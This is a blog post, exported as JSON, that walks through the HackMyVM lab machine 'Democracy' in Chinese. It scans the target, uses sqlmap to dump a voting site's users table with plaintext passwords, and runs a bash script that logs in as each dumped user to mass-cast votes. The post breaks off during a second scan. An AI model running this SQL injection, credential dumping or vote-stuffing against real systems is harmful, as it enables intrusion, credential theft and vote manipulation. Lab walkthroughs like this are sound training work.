{"id":659,"date":"2024-04-29T15:48:57","date_gmt":"2024-04-29T07:48:57","guid":{"rendered":"http:\/\/162.14.82.114\/?p=659"},"modified":"2024-04-29T15:48:57","modified_gmt":"2024-04-29T07:48:57","slug":"hmv-_-democracy","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/659\/04\/29\/2024\/","title":{"rendered":"hmv[-_-]Democracy"},"content":{"rendered":"<h1>Democracy<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547027.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547027.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428124351518\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547029.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547029.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429134459296\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ rustscan -a 192.168.0.148 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.148:22\nOpen 192.168.0.148:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open  http    syn-ack Apache httpd 2.4.56 ((Debian))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Vote for Your Candidate\n|_http-server-header: Apache\/2.4.56 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.148\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.148\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              jpg,txt,html,php,zip,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.148\/images\/]\n\/login.php            (Status: 200) [Size: 2115]\n\/register.php         (Status: 200) [Size: 2116]\n\/index.php            (Status: 200) [Size: 2676]\n\/vote.php             (Status: 302) [Size: 0] [--&gt; login.php]\n\/javascript           (Status: 301) [Size: 319] [--&gt; http:\/\/192.168.0.148\/javascript\/]\n\/config.php           (Status: 200) [Size: 0]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1143984 \/ 1543927 (74.10%)<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547030.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547030.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429134745740\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.148\/login.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547031.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547031.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429134827251\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.148\/register.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547032.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547032.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429134910144\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u6ce8\u518c\u518d\u767b\u5f55<\/h3>\n<p>\u6ce8\u518c\u4e86\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">hack\nhack<\/code><\/pre>\n<p>\u7136\u540e\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547033.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547033.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429140409893\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u662f\u4e00\u4e2a\u6295\u7968\u754c\u9762\uff0c\u5c1d\u8bd5\u6295\u7968\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547034.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547034.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429140443060\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>sql\u6ce8\u5165<\/h3>\n<p>\u53ef\u4ee5\u770b\u7968\u6570\u548c\u91cd\u7f6e\uff0c\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">POST \/vote.php HTTP\/1.1\nHost: 192.168.0.148\nContent-Length: 18\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.148\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.148\/vote.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=s7nd60540gjrp3rlqq0gssahi9\nConnection: close\n\ncandidate=democrat<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884csql\u6ce8\u5165\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547035.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547035.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429142050176\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6dfb\u52a0\u53c2\u6570\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.148\/vote.php --data candidate=democrat --cookie &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; --batch --dbs<\/code><\/pre>\n<p>\u4f46\u662f\u6bcf\u6b21\u5c1d\u8bd5\u90fd\u5f97\u91cd\u7f6e\u4e00\u4e0b\uff0c\u4e0d\u7136\u65e0\u6cd5\u8fdb\u884c\u6295\u7968\uff0c\u5199\u4e00\u4e2a\u811a\u672c\u91cd\u7f6e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547036.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547036.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429143135463\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">while true; do curl -s http:\/\/192.168.0.148\/vote.php -b &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; -d &quot;reset=1&quot;; done<\/code><\/pre>\n<p>\u4e22\u5728\u540e\u53f0\u8fd0\u884c\u5c31\u884c\u4e86\uff0c\u7136\u540e\u8fd0\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.148\/vote.php --data &quot;candidate=flag&quot; -p candidate --cookie &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; --batch --dbs<\/code><\/pre>\n<pre><code class=\"language-apl\">[02:39:08] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Debian\nweb application technology: Apache 2.4.56\nback-end DBMS: MySQL &gt;= 5.1 (MariaDB fork)\n[02:39:08] [INFO] fetching database names\n[02:39:08] [INFO] retrieved: &#039;information_schema&#039;\n[02:39:08] [INFO] retrieved: &#039;voting&#039;\navailable databases [2]:\n[*] information_schema\n[*] voting<\/code><\/pre>\n<p>\u8fdb\u4e00\u6b65\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.148\/vote.php --data &quot;candidate=flag&quot; -p candidate --cookie &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; --batch --dbs -D voting --tables<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: voting\n[2 tables]\n+-------+\n| users |\n| votes |\n+-------+<\/code><\/pre>\n<p>\u7136\u540e\u83b7\u53d6\u76f8\u5e94\u8868\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.148\/vote.php --data &quot;candidate=flag&quot; -p candidate --cookie &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; --batch --dbs -D voting -T votes --columns<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: voting\nTable: votes\n[3 columns]\n+-----------+-----------------+\n| Column    | Type            |\n+-----------+-----------------+\n| candidate | varchar(30)     |\n| id        | int(6) unsigned |\n| user_id   | int(6)          |\n+-----------+-----------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.148\/vote.php --data &quot;candidate=flag&quot; -p candidate --cookie &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; --batch --dbs -D voting -T users --columns<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: voting\nTable: users\n[3 columns]\n+----------+--------------+\n| Column   | Type         |\n+----------+--------------+\n| id       | int(11)      |\n| password | varchar(255) |\n| username | varchar(255) |\n+----------+--------------+<\/code><\/pre>\n<p>dump\u4e00\u4e0b\u76f8\u5173\u6570\u636e\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap --url http:\/\/192.168.0.148\/vote.php --data &quot;candidate=flag&quot; -p candidate --cookie &quot;PHPSESSID=5f95vmufeiq5j7q92nc6v9iriv; voted=1&quot; --batch --dbs -D voting -T users --dump<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: voting\nTable: users\n[1001 entries]\n+------+---------------+---------------+\n| id   | password      | username      |\n+------+---------------+---------------+\n[02:45:23] [WARNING] console output will be trimmed to last 256 rows due to large table size\n| 746  | 26021961      | la            |\n| 747  | 20021972      | fancie        |\n| 748  | spangle       | shamshad      |\n| 749  | elena1977     | inesita       |\n| 750  | foxxxy        | ramaprakash   |\n| 751  | juliet1       | athene        |\n| 752  | 060183        | gill          |\n..........\n| 997  | wonton        | wiebren       |\n| 1010 | 78945641561   | zack77        |\n| 1011 | blaze         | riyo          |\n| 1012 | 7786546pass   | dodo          |\n| 1015 | hack          | hack          |\n+------+---------------+---------------+<\/code><\/pre>\n<h3>\u6295\u7968<\/h3>\n<p>\u9996\u5148\u8981\u5904\u7406\u4e00\u4e0b\u6570\u636e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547037.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547037.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429144741173\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\u7528\u6237\u4e0e\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">cat \/home\/kali\/.local\/share\/sqlmap\/output\/192.168.0.148\/dump\/voting\/users.csv | cut -d &quot;,&quot; -f 3 &gt; username\ncat \/home\/kali\/.local\/share\/sqlmap\/output\/192.168.0.148\/dump\/voting\/users.csv | cut -d &quot;,&quot; -f 2 &gt; password<\/code><\/pre>\n<p>\u7136\u540e\uff0c\u4f7f\u7528shell\u8fdb\u884c\u6279\u91cf\u767b\u5f55\uff0c\u548c\u6295\u7968\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ curl -s -i &quot;http:\/\/192.168.0.148\/login.php&quot; -d &quot;username=hack&amp;password=hack&quot; | grep &quot;Cookie&quot; | awk &#039;{print $2}&#039; |sed &#039;s\/;$\/\/&#039;\n\nPHPSESSID=cbshugnskc7diu8srsdtm922a6;<\/code><\/pre>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\nurl=&quot;http:\/\/192.168.0.148&quot;\n\npaste username password | while IFS=$&#039;\\t&#039; read -e user pass\ndo\n    cookie=$(curl -s -i &quot;$url\/login.php&quot; -d &quot;username=$user&amp;password=$pass&quot; | grep &quot;Cookie&quot; | awk &#039;{print $2}&#039;|sed &#039;s\/;$\/\/&#039;)\n    curl -s &quot;$url\/vote.php&quot; -b &quot;$cookie&quot; -d &quot;candidate=democrat&quot; &gt;\/dev\/null\n    echo &quot;[+] $user has voted!&quot;\ndone<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547039.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547039.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429153919505\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u76f4\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547040.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547040.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429153952601\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547041.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547041.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429154016339\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u91cd\u65b0\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ rustscan -a 192.168.0.148 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.148:21\nOpen 192.168.0.148:22\nOpen 192.168.0.148:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack ProFTPD\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rwxrwxrwx   1 root     root          258 Apr 30  2023 votes [NSE: writeable]\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa 